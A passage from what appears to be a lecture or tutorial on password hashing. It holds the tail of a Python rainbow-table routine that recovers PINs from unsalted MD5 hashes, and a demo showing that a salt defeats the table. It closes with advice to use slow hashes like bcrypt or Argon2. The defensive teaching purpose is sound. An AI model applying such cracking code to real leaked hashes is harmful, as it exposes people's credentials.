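        for start in table.get(y, []):
            p = start
            for _ in range(CHAIN_LEN):
                if md5_hex(p) == target:
                    return p
                p = reduce_hash(md5_hex(p))
        y = reduce_hash(md5_hex(y))
    return None


def salted_hash(password: str, salt: str) -> str:
    """The hashed string is salt+password, so a table built from bare PINs
    contains no chain through it; the attacker would need a table per salt."""
    return md5_hex(salt + password)


if __name__ == "__main__":
    table = build_table(300)
    pin = next(iter(table.values()))[0]           # a chain start is always covered
    print(pin, crack(md5_hex(pin), table))        # recovered from the table
    print(crack(salted_hash(pin, "k9Qx"), table)) # None: the salt defeats the table
```

Storing the salt next to the hash is fine: its job is not secrecy but forcing the attacker to redo the precomputation for every user. In a real system the fast hash would also be replaced by a deliberately slow one (bcrypt, scrypt, Argon2, PBKDF2) so that even per-user brute force is expensive.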

DEMO


Questions?